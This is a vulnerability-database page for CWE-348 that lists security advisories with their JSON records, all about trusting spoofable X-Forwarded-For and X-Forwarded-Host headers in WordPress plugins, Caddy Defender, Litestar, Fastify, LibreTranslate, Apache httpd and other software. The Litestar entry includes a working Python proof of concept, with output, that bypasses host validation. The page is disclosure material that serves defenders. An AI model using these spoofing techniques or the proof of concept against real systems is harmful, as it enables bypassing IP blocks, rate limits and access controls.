CWE-348
AllowedUse of Less Trusted Source
Abstraction: Base · Status: Draft
The product has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack.
114 vulnerabilities reference this CWE, most recent first.
GHSA-29XF-XJ7Q-WJ7P
Vulnerability from github – Published: 2024-08-31 09:30 – Updated: 2024-08-31 09:30The IP Vault – WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.
{
"affected": [],
"aliases": [
"CVE-2022-4536"
],
"database_specific": {
"cwe_ids": [
"CWE-348"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-31T09:15:04Z",
"severity": "MODERATE"
},
"details": "The IP Vault \u2013 WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.",
"id": "GHSA-29xf-xj7q-wj7p",
"modified": "2024-08-31T09:30:44Z",
"published": "2024-08-31T09:30:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4536"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=2922250%40ip-vault-wp-firewall\u0026new=2922250%40ip-vault-wp-firewall\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/66e89753-f83e-4e60-b165-6d3d101d6c59?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3H23-RRPC-3P87
Vulnerability from github – Published: 2026-05-19 20:29 – Updated: 2026-05-19 20:29Impact
Caddy Defender used r.RemoteAddr when evaluating whether a request should be blocked. RemoteAddr is the address of the immediate peer connected to Caddy.
In deployments where Caddy is behind a trusted proxy, CDN, or load balancer, the immediate peer is usually the proxy, not the original client. Caddy resolves the original client address into its client_ip request variable after applying the configured trusted_proxies policy, but Defender did not use that value.
As a result, clients from blocked IP ranges could bypass Defender when accessing Caddy through a trusted proxy whose own IP address was not blocked. This affects deployments that use Defender behind trusted proxies and expect it to enforce blocking based on the real client IP.
Patches
The issue is fixed by making Defender prefer Caddys resolved client_ip request variable when it is available. Defender falls back to RemoteAddr only when Caddy has not provided a resolved client IP.
Users should upgrade to v0.10.1 or later.
Workarounds
There is no complete workaround in affected Defender versions for deployments that rely on Caddys trusted proxy client IP resolution.
Until upgrading, affected users should enforce equivalent IP blocking at the trusted proxy, CDN, load balancer, firewall, or other edge layer before traffic reaches Caddy.
Deployments where Caddy receives traffic directly from clients, without an intermediate trusted proxy, are not affected by this bypass.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "pkg.jsn.cam/caddy-defender"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46415"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-348"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T20:29:14Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nCaddy Defender used `r.RemoteAddr` when evaluating whether a request should be blocked. `RemoteAddr` is the address of the immediate peer connected to Caddy.\n\nIn deployments where Caddy is behind a trusted proxy, CDN, or load balancer, the immediate peer is usually the proxy, not the original client. Caddy resolves the original client address into its `client_ip` request variable after applying the configured `trusted_proxies` policy, but Defender did not use that value.\n\nAs a result, clients from blocked IP ranges could bypass Defender when accessing Caddy through a trusted proxy whose own IP address was not blocked. This affects deployments that use Defender behind trusted proxies and expect it to enforce blocking based on the real client IP.\n\n### Patches\n\nThe issue is fixed by making Defender prefer Caddys resolved `client_ip` request variable when it is available. Defender falls back to `RemoteAddr` only when Caddy has not provided a resolved client IP.\n\nUsers should upgrade to `v0.10.1` or later.\n\n### Workarounds\n\nThere is no complete workaround in affected Defender versions for deployments that rely on Caddys trusted proxy client IP resolution.\n\nUntil upgrading, affected users should enforce equivalent IP blocking at the trusted proxy, CDN, load balancer, firewall, or other edge layer before traffic reaches Caddy.\n\nDeployments where Caddy receives traffic directly from clients, without an intermediate trusted proxy, are not affected by this bypass.",
"id": "GHSA-3h23-rrpc-3p87",
"modified": "2026-05-19T20:29:14Z",
"published": "2026-05-19T20:29:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/JasonLovesDoggo/caddy-defender/security/advisories/GHSA-3h23-rrpc-3p87"
},
{
"type": "WEB",
"url": "https://github.com/JasonLovesDoggo/caddy-defender/pull/139"
},
{
"type": "PACKAGE",
"url": "https://github.com/JasonLovesDoggo/caddy-defender"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Caddy Defender trusted proxy client IP bypass"
}
GHSA-3JQJ-JP4R-6XWM
Vulnerability from github – Published: 2026-01-07 12:31 – Updated: 2026-01-07 12:31The AA Block Country plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.0.1. This is due to the plugin trusting user-supplied headers such as HTTP_X_FORWARDED_FOR to determine the client's IP address without proper validation or considering if the server is behind a trusted proxy. This makes it possible for unauthenticated attackers to bypass IP-based access restrictions by spoofing their IP address via the X-Forwarded-For header.
{
"affected": [],
"aliases": [
"CVE-2025-13694"
],
"database_specific": {
"cwe_ids": [
"CWE-348"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-07T12:16:49Z",
"severity": "MODERATE"
},
"details": "The AA Block Country plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.0.1. This is due to the plugin trusting user-supplied headers such as HTTP_X_FORWARDED_FOR to determine the client\u0027s IP address without proper validation or considering if the server is behind a trusted proxy. This makes it possible for unauthenticated attackers to bypass IP-based access restrictions by spoofing their IP address via the X-Forwarded-For header.",
"id": "GHSA-3jqj-jp4r-6xwm",
"modified": "2026-01-07T12:31:20Z",
"published": "2026-01-07T12:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13694"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/aa-block-country/tags/1.0.1/aablockcountry.php#L26"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/aa-block-country/trunk/aablockcountry.php#L26"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/037ac32a-dc2e-4e9f-9318-65dfee1c80e9?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3QMC-CJ7Q-62HV
Vulnerability from github – Published: 2026-06-10 19:12 – Updated: 2026-06-10 19:12Summary
AllowedHostsMiddleware trusts the X-Forwarded-Host header as a fallback when the Host header is absent. Since X-Forwarded-Host is a client-controllable header, an attacker can bypass the allowed hosts validation by omitting the Host header and supplying an X-Forwarded-Host header set to a whitelisted domain. This enables host header injection attacks such as password reset poisoning, cache poisoning, and server-side request routing manipulation.
Details
In AllowedHostsMiddleware.__call__, the host value used for validation is resolved as follows:
https://github.com/litestar-org/litestar/blob/main/litestar/middleware/allowed_hosts.py#L68
headers = MutableScopeHeaders(scope=scope)
if host := headers.get("host", headers.get("x-forwarded-host", "")).split(":")[0]:
if self.allowed_hosts_regex.fullmatch(host):
await self.app(scope, receive, send)
return
When Host is absent (e.g., HTTP/1.0 clients, misconfigured proxies, or raw TCP connections), the middleware falls back to X-Forwarded-Host without any verification that the request actually passed through a trusted reverse proxy.
An attacker can send a request with no Host header and set X-Forwarded-Host to any whitelisted domain, bypassing the entire allowed hosts check. The application then processes the request as if it originated from a trusted host.
This is particularly dangerous when applications use the resolved host value for:
- Generating password reset links (Host header injection → link points to attacker domain)
- Cache key generation (cache poisoning)
- Routing or backend selection decisions
PoC
"""
PoC: Allowed Hosts Bypass via X-Forwarded-Host in Litestar 3.0.0b0
Affected:
litestar/middleware/allowed_hosts.py:68
-> headers.get("host", headers.get("x-forwarded-host", "")).split(":")[0]
"""
import asyncio
from litestar import Litestar, get
from litestar.config.allowed_hosts import AllowedHostsConfig
from litestar.testing import TestClient
@get("/")
async def index() -> dict:
return {"status": "ok"}
app = Litestar(
route_handlers=[index],
allowed_hosts=AllowedHostsConfig(allowed_hosts=["trusted.example.com"]),
)
# --- 1. Baseline: invalid host is blocked ---
with TestClient(app=app) as c:
resp = c.get("/", headers={"host": "evil.com"})
assert resp.status_code == 400
print(f"[*] Host: evil.com -> {resp.status_code} (blocked)")
# --- 2. Bypass: ASGI scope without Host, with X-Forwarded-Host ---
async def test_bypass():
scope = {
"type": "http",
"method": "GET",
"path": "/",
"root_path": "",
"scheme": "http",
"query_string": b"",
"headers": [
# No "host" header — only x-forwarded-host
(b"x-forwarded-host", b"trusted.example.com"),
],
"server": ("testserver", 80),
"app": app,
"litestar_app": app,
"state": {},
}
captured = {}
async def receive():
return {"type": "http.request", "body": b""}
async def send(message):
if message["type"] == "http.response.start":
captured["status"] = message["status"]
await app(scope, receive, send)
return captured["status"]
status = asyncio.run(test_bypass())
print(f"[*] No Host + X-Forwarded-Host: trusted.example.com -> {status} (bypassed)")
assert status == 200, f"Expected 200, got {status}"
print(f"[!] AllowedHosts check passed using client-controlled X-Forwarded-Host")
Output:
[*] Host: evil.com -> 400 (blocked)
[*] No Host + X-Forwarded-Host: trusted.example.com -> 200 (bypassed)
[!] AllowedHosts check passed using client-controlled X-Forwarded-Host
Impact
This is a host validation bypass vulnerability. Any application using AllowedHostsConfig is affected when deployed without a reverse proxy that strips X-Forwarded-Host, or when accepting HTTP/1.0 connections.
An attacker can bypass the allowed hosts restriction and have requests processed as if they originated from a trusted host. This can lead to:
- Password reset poisoning: if the application uses the host value to generate reset links, the attacker can redirect them to a malicious domain
- Cache poisoning: cached responses keyed on the host value can be polluted with attacker-controlled content
- Routing manipulation: backend routing decisions based on host value can be influenced
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "litestar"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.22.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48061"
],
"database_specific": {
"cwe_ids": [
"CWE-348",
"CWE-807"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-10T19:12:10Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\n`AllowedHostsMiddleware` trusts the `X-Forwarded-Host` header as a fallback when the `Host` header is absent. Since `X-Forwarded-Host` is a client-controllable header, an attacker can bypass the allowed hosts validation by omitting the `Host` header and supplying an `X-Forwarded-Host` header set to a whitelisted domain. This enables host header injection attacks such as password reset poisoning, cache poisoning, and server-side request routing manipulation.\n\n### Details\n\nIn `AllowedHostsMiddleware.__call__`, the host value used for validation is resolved as follows:\n\nhttps://github.com/litestar-org/litestar/blob/main/litestar/middleware/allowed_hosts.py#L68\n\n```python\nheaders = MutableScopeHeaders(scope=scope)\nif host := headers.get(\"host\", headers.get(\"x-forwarded-host\", \"\")).split(\":\")[0]:\n if self.allowed_hosts_regex.fullmatch(host):\n await self.app(scope, receive, send)\n return\n```\n\nWhen `Host` is absent (e.g., HTTP/1.0 clients, misconfigured proxies, or raw TCP connections), the middleware falls back to `X-Forwarded-Host` without any verification that the request actually passed through a trusted reverse proxy.\n\nAn attacker can send a request with no `Host` header and set `X-Forwarded-Host` to any whitelisted domain, bypassing the entire allowed hosts check. The application then processes the request as if it originated from a trusted host.\n\nThis is particularly dangerous when applications use the resolved host value for:\n- Generating password reset links (`Host` header injection \u2192 link points to attacker domain)\n- Cache key generation (cache poisoning)\n- Routing or backend selection decisions\n\n### PoC\n\n```python\n\"\"\"\nPoC: Allowed Hosts Bypass via X-Forwarded-Host in Litestar 3.0.0b0\n\nAffected:\n litestar/middleware/allowed_hosts.py:68\n -\u003e headers.get(\"host\", headers.get(\"x-forwarded-host\", \"\")).split(\":\")[0]\n\"\"\"\n\nimport asyncio\nfrom litestar import Litestar, get\nfrom litestar.config.allowed_hosts import AllowedHostsConfig\nfrom litestar.testing import TestClient\n\n\n@get(\"/\")\nasync def index() -\u003e dict:\n return {\"status\": \"ok\"}\n\n\napp = Litestar(\n route_handlers=[index],\n allowed_hosts=AllowedHostsConfig(allowed_hosts=[\"trusted.example.com\"]),\n)\n\n\n# --- 1. Baseline: invalid host is blocked ---\n\nwith TestClient(app=app) as c:\n resp = c.get(\"/\", headers={\"host\": \"evil.com\"})\n assert resp.status_code == 400\n print(f\"[*] Host: evil.com -\u003e {resp.status_code} (blocked)\")\n\n\n# --- 2. Bypass: ASGI scope without Host, with X-Forwarded-Host ---\n\nasync def test_bypass():\n scope = {\n \"type\": \"http\",\n \"method\": \"GET\",\n \"path\": \"/\",\n \"root_path\": \"\",\n \"scheme\": \"http\",\n \"query_string\": b\"\",\n \"headers\": [\n # No \"host\" header \u2014 only x-forwarded-host\n (b\"x-forwarded-host\", b\"trusted.example.com\"),\n ],\n \"server\": (\"testserver\", 80),\n \"app\": app,\n \"litestar_app\": app,\n \"state\": {},\n }\n\n captured = {}\n\n async def receive():\n return {\"type\": \"http.request\", \"body\": b\"\"}\n\n async def send(message):\n if message[\"type\"] == \"http.response.start\":\n captured[\"status\"] = message[\"status\"]\n\n await app(scope, receive, send)\n return captured[\"status\"]\n\nstatus = asyncio.run(test_bypass())\nprint(f\"[*] No Host + X-Forwarded-Host: trusted.example.com -\u003e {status} (bypassed)\")\nassert status == 200, f\"Expected 200, got {status}\"\nprint(f\"[!] AllowedHosts check passed using client-controlled X-Forwarded-Host\")\n```\n\n**Output:**\n```\n[*] Host: evil.com -\u003e 400 (blocked)\n[*] No Host + X-Forwarded-Host: trusted.example.com -\u003e 200 (bypassed)\n[!] AllowedHosts check passed using client-controlled X-Forwarded-Host\n```\n\n### Impact\n\nThis is a host validation bypass vulnerability. Any application using `AllowedHostsConfig` is affected when deployed without a reverse proxy that strips `X-Forwarded-Host`, or when accepting HTTP/1.0 connections.\n\nAn attacker can bypass the allowed hosts restriction and have requests processed as if they originated from a trusted host. This can lead to:\n\n- **Password reset poisoning**: if the application uses the host value to generate reset links, the attacker can redirect them to a malicious domain\n- **Cache poisoning**: cached responses keyed on the host value can be polluted with attacker-controlled content\n- **Routing manipulation**: backend routing decisions based on host value can be influenced",
"id": "GHSA-3qmc-cj7q-62hv",
"modified": "2026-06-10T19:12:10Z",
"published": "2026-06-10T19:12:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-3qmc-cj7q-62hv"
},
{
"type": "WEB",
"url": "https://github.com/litestar-org/litestar/commit/6930a20ceb543912cd651b42deae5b9f3637a262"
},
{
"type": "PACKAGE",
"url": "https://github.com/litestar-org/litestar"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Litestar: AllowedHostsMiddleware bypasses host validation via client-controlled X-Forwarded-Host header"
}
GHSA-3XV9-89FM-7H4R
Vulnerability from github – Published: 2026-04-03 03:24 – Updated: 2026-05-06 20:32Summary
diffs viewer misclassifies proxied remote requests as loopback when allowRemoteViewer is disabled
Current Maintainer Triage
- Status: open
- Normalized severity: low
- Assessment: Shipped v2026.3.28 misclassified proxied diff-viewer requests as local loopback in some cases, a real but low-severity access-control flaw.
Affected Packages / Versions
- Package:
openclaw(npm) - Latest published npm version:
2026.3.31 - Vulnerable version range:
<=2026.3.28 - Patched versions:
>= 2026.3.31 - First stable tag containing the fix:
v2026.3.31
Fix Commit(s)
30a1690323088fd291abd11643a264a6828a002c— 2026-03-30T14:17:27-06:00
Release Process Note
- The fix is already present in released version
2026.3.31. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work.
Thanks @smaeljaish771 for reporting.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2026.3.28"
},
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.3.31"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41403"
],
"database_specific": {
"cwe_ids": [
"CWE-348",
"CWE-807"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T03:24:25Z",
"nvd_published_at": "2026-04-28T19:37:43Z",
"severity": "MODERATE"
},
"details": "## Summary\ndiffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 misclassified proxied diff-viewer requests as local loopback in some cases, a real but low-severity access-control flaw.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `\u003c=2026.3.28`\n- Patched versions: `\u003e= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `30a1690323088fd291abd11643a264a6828a002c` \u2014 2026-03-30T14:17:27-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.",
"id": "GHSA-3xv9-89fm-7h4r",
"modified": "2026-05-06T20:32:43Z",
"published": "2026-04-03T03:24:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41403"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: diffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled"
}
GHSA-444R-CWP2-X5XF
Vulnerability from github – Published: 2026-03-25 19:32 – Updated: 2026-03-25 19:32Summary
When trustProxy is configured with a restrictive trust function (e.g., a specific IP like trustProxy: '10.0.0.1', a subnet, a hop count, or a custom function), the request.protocol and request.host getters read X-Forwarded-Proto and X-Forwarded-Host headers from any connection — including connections from untrusted IPs. This allows an attacker connecting directly to Fastify (bypassing the proxy) to spoof both the protocol and host seen by the application.
Affected Versions
fastify <= 5.8.2
Impact
Applications using request.protocol or request.host for security decisions (HTTPS enforcement, secure cookie flags, CSRF origin checks, URL construction, host-based routing) are affected when trustProxy is configured with a restrictive trust function.
When trustProxy: true (trust everything), both host and protocol trust all forwarded headers — this is expected behavior. The vulnerability only manifests with restrictive trust configurations.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.8.2"
},
"package": {
"ecosystem": "npm",
"name": "fastify"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.8.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-3635"
],
"database_specific": {
"cwe_ids": [
"CWE-348"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-25T19:32:28Z",
"nvd_published_at": "2026-03-23T14:16:34Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nWhen `trustProxy` is configured with a restrictive trust function (e.g., a specific IP like `trustProxy: \u002710.0.0.1\u0027`, a subnet, a hop count, or a custom function), the `request.protocol` and `request.host` getters read `X-Forwarded-Proto` and `X-Forwarded-Host` headers from any connection \u2014 including connections from untrusted IPs. This allows an attacker connecting directly to Fastify (bypassing the proxy) to spoof both the protocol and host seen by the application.\n\n## Affected Versions\n\nfastify \u003c= 5.8.2\n\n## Impact\n\nApplications using `request.protocol` or `request.host` for security decisions (HTTPS enforcement, secure cookie flags, CSRF origin checks, URL construction, host-based routing) are affected when `trustProxy` is configured with a restrictive trust function.\n\nWhen `trustProxy: true` (trust everything), both `host` and `protocol` trust all forwarded headers \u2014 this is expected behavior. The vulnerability only manifests with restrictive trust configurations.",
"id": "GHSA-444r-cwp2-x5xf",
"modified": "2026-03-25T19:32:28Z",
"published": "2026-03-25T19:32:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fastify/fastify/security/advisories/GHSA-444r-cwp2-x5xf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3635"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/fastify/fastify"
},
{
"type": "WEB",
"url": "https://github.com/fastify/fastify/releases/tag/v5.8.3"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3635"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "fastify: request.protocol and request.host Spoofable via X-Forwarded-Proto/Host from Untrusted Connections"
}
GHSA-4RJG-9QQ9-25M8
Vulnerability from github – Published: 2026-06-29 18:31 – Updated: 2026-06-29 18:31LibreTranslate through 1.9.7, fixed in commit 397fd22, contains an IP spoofing vulnerability in the get_remote_address() function that allows unauthenticated attackers to spoof client IP addresses by injecting arbitrary values into the X-Forwarded-For header without trusted proxy validation. Attackers can bypass per-IP rate limiting and flood bans by supplying forged addresses in the X-Forwarded-For header to enable unlimited API abuse.
{
"affected": [],
"aliases": [
"CVE-2026-57942"
],
"database_specific": {
"cwe_ids": [
"CWE-348"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-29T18:16:39Z",
"severity": "MODERATE"
},
"details": "LibreTranslate through 1.9.7, fixed in commit 397fd22, contains an IP spoofing vulnerability in the get_remote_address() function that allows unauthenticated attackers to spoof client IP addresses by injecting arbitrary values into the X-Forwarded-For header without trusted proxy validation. Attackers can bypass per-IP rate limiting and flood bans by supplying forged addresses in the X-Forwarded-For header to enable unlimited API abuse.",
"id": "GHSA-4rjg-9qq9-25m8",
"modified": "2026-06-29T18:31:55Z",
"published": "2026-06-29T18:31:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57942"
},
{
"type": "WEB",
"url": "https://github.com/LibreTranslate/LibreTranslate/issues/986"
},
{
"type": "WEB",
"url": "https://github.com/LibreTranslate/LibreTranslate/pull/987"
},
{
"type": "WEB",
"url": "https://github.com/LibreTranslate/LibreTranslate/commit/397fd224080515d4001a1bc60c8fed53e3c56b6f"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/libretranslate-ip-spoofing-via-x-forwarded-for-header"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-4XC6-MGV4-5V44
Vulnerability from github – Published: 2022-06-10 00:00 – Updated: 2025-05-01 18:31Apache HTTP Server 2.4.53 and earlier may not send the X-Forwarded-* headers to the origin server based on client side Connection header hop-by-hop mechanism. This may be used to bypass IP based authentication on the origin server/application.
{
"affected": [],
"aliases": [
"CVE-2022-31813"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-348"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-09T17:15:00Z",
"severity": "CRITICAL"
},
"details": "Apache HTTP Server 2.4.53 and earlier may not send the X-Forwarded-* headers to the origin server based on client side Connection header hop-by-hop mechanism. This may be used to bypass IP based authentication on the origin server/application.",
"id": "GHSA-4xc6-mgv4-5v44",
"modified": "2025-05-01T18:31:42Z",
"published": "2022-06-10T00:00:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31813"
},
{
"type": "WEB",
"url": "https://httpd.apache.org/security/vulnerabilities_24.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7QUGG2QZWHTITMABFLVXA4DNYUOTPWYQ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YPY2BLEVJWFH34AX77ZJPLD2OOBYR6ND"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7QUGG2QZWHTITMABFLVXA4DNYUOTPWYQ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YPY2BLEVJWFH34AX77ZJPLD2OOBYR6ND"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202208-20"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220624-0005"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/06/08/8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5554-V93Q-454G
Vulnerability from github – Published: 2023-06-09 09:30 – Updated: 2024-04-04 04:42The Brizy Page Builder plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.4.18. This is due to an implicit trust of user-supplied IP addresses in an 'X-Forwarded-For' HTTP header for the purpose of validating allowed IP addresses against a Maintenance Mode whitelist. Supplying a whitelisted IP address within the 'X-Forwarded-For' header allows maintenance mode to be bypassed and may result in the disclosure of potentially sensitive information or allow access to restricted functionality.
{
"affected": [],
"aliases": [
"CVE-2023-2897"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-348"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-09T07:15:10Z",
"severity": "MODERATE"
},
"details": "The Brizy Page Builder plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.4.18. This is due to an implicit trust of user-supplied IP addresses in an \u0027X-Forwarded-For\u0027 HTTP header for the purpose of validating allowed IP addresses against a Maintenance Mode whitelist. Supplying a whitelisted IP address within the \u0027X-Forwarded-For\u0027 header allows maintenance mode to be bypassed and may result in the disclosure of potentially sensitive information or allow access to restricted functionality.",
"id": "GHSA-5554-v93q-454g",
"modified": "2024-04-04T04:42:25Z",
"published": "2023-06-09T09:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2897"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/2919443/brizy"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae342dd9-2f5f-4356-8fb4-9a3e5f4f8316?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-5V23-FFPH-XC48
Vulnerability from github – Published: 2025-05-16 06:30 – Updated: 2025-05-16 06:30Bypass Connection Restriction vulnerability in Hitachi Infrastructure Analytics Advisor (Data Center Analytics component), Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view component).This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.4-00.
{
"affected": [],
"aliases": [
"CVE-2025-1245"
],
"database_specific": {
"cwe_ids": [
"CWE-348"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-16T06:15:45Z",
"severity": "MODERATE"
},
"details": "Bypass Connection Restriction vulnerability in Hitachi Infrastructure Analytics Advisor (Data Center Analytics component), Hitachi Ops Center Analyzer\u00a0 (Hitachi Ops Center Analyzer detail view component).This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.4-00.",
"id": "GHSA-5v23-ffph-xc48",
"modified": "2025-05-16T06:30:24Z",
"published": "2025-05-16T06:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1245"
},
{
"type": "WEB",
"url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-116/index.html"
}
],
